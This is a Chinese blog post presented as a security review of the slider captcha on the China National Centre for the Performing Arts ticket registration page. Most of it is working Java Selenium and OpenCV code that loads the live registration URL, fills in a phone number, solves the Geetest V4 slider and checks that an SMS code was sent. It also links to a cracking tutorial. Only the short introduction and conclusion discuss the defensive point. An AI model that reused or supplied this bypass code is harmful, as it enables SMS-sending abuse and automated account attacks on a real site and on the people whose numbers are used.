前言
由于网站注册入口容易被黑客攻击,存在如下安全问题:
- 暴力破解密码,造成用户信息泄露
- 短信盗刷的安全问题,影响业务及导致用户投诉
- 带来经济损失,尤其是后付费客户,风险巨大,造成亏损无底洞
所以大部分网站及App 都采取图形验证码或滑动验证码等交互解决方案, 但在机器学习能力提高的当下,连百度这样的大厂都遭受攻击导致点名批评, 图形验证及交互验证方式的安全性到底如何? 请看具体分析
一、 国家大剧院 PC端注册入口
简介:中国国家大剧院位于北京市中心西长安街沿线,比邻人民大会堂和天安门广场。国家大剧院内设歌剧院、音乐厅、戏剧场、小剧场四个剧场和相关配套设施,总建筑面积 21.75 万平方米,整体风格简约大气。造型独特的主体结构,一池清澈见底的湖水,以及外围大面积的绿地,不仅恰到好处地衬托出“水上明珠”的光彩夺目,而且彰显着“城市中的剧院、剧院中的城市”的理念和特质。
国家大剧院作为大型公益性文化艺术机构和国家级表演艺术中心,一直秉持“引领、传承、创新、开放、包容” 的发展理念,已成为世界优秀文化艺术的展示窗口和交流平台。
二、 安全性分析报告:
采用极验的V4版本,容易被模拟器绕过甚至逆向后暴力攻击,滑动拼图识别率在 95% 以上。
三、 测试方法:
前端界面分析,版本号为4.0,这就好办了, 网上有大量现成的逆向文章及视频参考,不过我们这次不用逆向, 只是采用模拟器的方式,关键点主要模拟器交互、距离识别和轨道算法3部分
极验4代滑块验证码破解(补环境直接强暴式拿下)
https://blog.csdn.net/qq_41866988/article/details/132020587
- 模拟器交互部分
private GeetClient geetClient = new GeetClient();
private final String INDEX_URL = "https://wticket.chncpa.org/register.html";
@Override
public RetEntity send(WebDriver driver, String areaCode, String phone) {
try {
RetEntity retEntity = new RetEntity();
driver.get(INDEX_URL);
Thread.sleep(1000);
// 输入手机号
WebElement phoneElemet = ChromeDriverManager.waitElement(driver, By.id("phoneNumber"), 500);
phoneElemet.sendKeys(phone);
// 获取滑动按钮
WebElement getCodeElemet = ChromeDriverManager.waitElement(driver, By.id("getSmsCode"), 1);
getCodeElemet.click();
Thread.sleep(1000);
boolean result = geetClient.moveV4(driver, "Chncpa");
if (result) {
Thread.sleep(3000);
WebElement resendElement = ChromeDriverManager.waitElement(driver, By.id("smsCodeNext"), 1);
String msg = (result) ? resendElement.getText() : null;
System.out.println("msg=" + msg);
if (msg != null && msg.contains("秒后重发")) {
retEntity.setMsg(msg);
retEntity.setRet(0);
}
}
System.out.println("result=" + result);
return retEntity;
} catch (Exception e) {
System.out.println("send() " + e.toString());
StringBuffer er = new StringBuffer("send() " + e.toString() + "\n");
for (StackTraceElement elment : e.getStackTrace())
er.append(elment.toString() + "\n");
System.out.println(er.toString());
return null;
} finally {
driver.manage().deleteAllCookies();
}
}
2. 距离识别
/**
* Open Cv 图片模板匹配
*
* @param tpPath
* 模板图片路径
* @param bgPath
* 目标图片路径
* @return { width, maxX }
*/
public String[] getWidth(String tpPath, String bgPath, String resultFile) {
try {
Rect rectCrop = clearWhite(tpPath);
Mat g_tem = Imgcodecs.imread(tpPath);
Mat clearMat = g_tem.submat(rectCrop);
Mat cvt = new Mat();
Imgproc.cvtColor(clearMat, cvt, Imgproc.COLOR_RGB2GRAY);
Mat edgesSlide = new Mat();
Imgproc.Canny(cvt, edgesSlide, threshold1, threshold2);
Mat cvtSlide = new Mat();
Imgproc.cvtColor(edgesSlide, cvtSlide, Imgproc.COLOR_GRAY2RGB);
Imgcodecs.imwrite(tpPath, cvtSlide);
Mat g_b = Imgcodecs.imread(bgPath);
Mat edgesBg = new Mat();
Imgproc.Canny(g_b, edgesBg, threshold1, threshold2);
Mat cvtBg = new Mat();
Imgproc.cvtColor(edgesBg, cvtBg, Imgproc.COLOR_GRAY2RGB);
int result_rows = cvtBg.rows() - cvtSlide.rows() + 1;
int result_cols = cvtBg.cols() - cvtSlide.cols() + 1;
Mat g_result = new Mat(result_rows, result_cols, CvType.CV_32FC1);
Imgproc.matchTemplate(cvtBg, cvtSlide, g_result, Imgproc.TM_CCOEFF_NORMED); // 归一化平方差匹配法
// 归一化相关匹配法
MinMaxLocResult minMaxLoc = Core.minMaxLoc(g_result);
Point maxLoc = minMaxLoc.maxLoc;
Imgproc.rectangle(cvtBg, maxLoc, new Point(maxLoc.x + cvtSlide.cols(), maxLoc.y + cvtSlide.rows()), new Scalar(0, 0, 255), 1);
Imgcodecs.imwrite(resultFile, cvtBg);
String width = String.valueOf(cvtSlide.cols());
String maxX = String.valueOf(maxLoc.x + cvtSlide.cols());
System.out.println("OpenCv2.getWidth() width=" + width + ",maxX=" + maxX);
return new String[] { width, maxX };
} catch (Throwable e) {
System.out.println("getWidth() " + e.toString());
logger.error("getWidth() " + e.toString());
for (StackTraceElement elment : e.getStackTrace()) {
logger.error(elment.toString());
}
return null;
}
}
- 轨道生成及移动算法
/**
* class='geetest_bg_a30707f4 geetest_bg'
*
* @param driver
* @param offSet
* @return
*/
public boolean moveV4(WebDriver driver, String spCode) {
File bigFile = null, smllFile = null;
try {
long t = System.currentTimeMillis();
String path = dataPath + "/" + spCode + "/";
// 获取背景图
List<WebElement> urlElements = driver.findElements(By.xpath("//div[contains(@style,'background-image')]"));
int index = (urlElements.size() >= 4) ? 2 : 0;
// 小图
smllFile = new File(path + t + "_small.png");
byte[] smallBytes = getImgByBackGround(urlElements.get(index), smllFile);
// 大图
bigFile = new File(path + t + "_bg.png");
byte[] bigBytes = getImgByBackGround(urlElements.get(index + 1), bigFile);
String ckSum = GenChecksumUtil.genChecksum(bigBytes);
String resultFile = path + t + "_o.png";
String[] result = cv2.getWidth(smllFile.getAbsolutePath(), bigFile.getAbsolutePath(), resultFile);
// String[] result = cv2.getOpenCvDistance(ckSum, bigBytes,
// smallBytes, spCode, 2);
// 计算距离
Double width = Double.parseDouble(result[0]);
BigDecimal left = new BigDecimal((80.48 - width) / 2).setScale(2, BigDecimal.ROUND_HALF_UP);
Double d = Double.parseDouble(result[1]) - (width + left.doubleValue());
int distince = d.intValue();
System.out.println("distince=" + distince);
By sliedBy = By.xpath("//div[contains(@class,'geetest_btn')]");
List<WebElement> sliedElements = driver.findElements(sliedBy);
System.out.println("size=" + sliedElements.size());
boolean displayed;
for (WebElement web : sliedElements) {
displayed = web.isDisplayed();
System.out.println("displayed=" + displayed + "->" + web.getAttribute("class"));
if (displayed) {
ActionMove.move(driver, web, distince);
break;
}
}
// 滑动结果
WebElement infoElement = ChromeDriverManager.getInstance().waitForLoad(By.className("geetest_result_tips"), 1);
String gtInfo = (infoElement != null) ? infoElement.getAttribute("innerText") : null;
if (gtInfo != null) {
System.out.println("gtInfo=" + gtInfo);
if (gtInfo.contains("速度超过") || gtInfo.contains("通过验证")) {
return true;
}
}
if (smllFile != null && smllFile.exists())
smllFile.delete();
if (bigFile != null && bigFile.exists())
bigFile.delete();
return false;
} catch (Exception e) {
logger.error(e.toString());
return false;
}
}
private byte[] getImgByBackGround(WebElement urlElement, File bFile) throws Exception {
String cssValue = (urlElement != null) ? urlElement.getCssValue("background-image") : null;
String bgUrl = (cssValue != null && cssValue.contains("\"")) ? cssValue.split("\"")[1] : null;
if (bgUrl == null || !bgUrl.startsWith("http")) {
System.out.println("bgUrl=" + bgUrl);
return null;
}
FileUtils.copyURLToFile(new URL(bgUrl), bFile);
byte[] bigBytes = FileUtils.readFileToByteArray(bFile);
return bigBytes;
}
- OpenCv 轮廓匹配测试样例:
四丶结语
国家大剧院作为大型公益性文化艺术机构和国家级表演艺术中心, 采用的是通俗的滑动验证产品, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。
很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
比如:“ 需求这么赶,当然是先实现功能啊 ”,“ 业务量很小啦,系统就这么点人用,不怕的 ” , “ 我们怎么会被盯上呢,不可能的 ”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。越早还,问题就越小,损失就越低。
谷歌图形验证码在AI 面前已经形同虚设,所以谷歌宣布退出验证码服务, 那么当所有的图形验证码都被破解时,大家又该如何做好防御呢?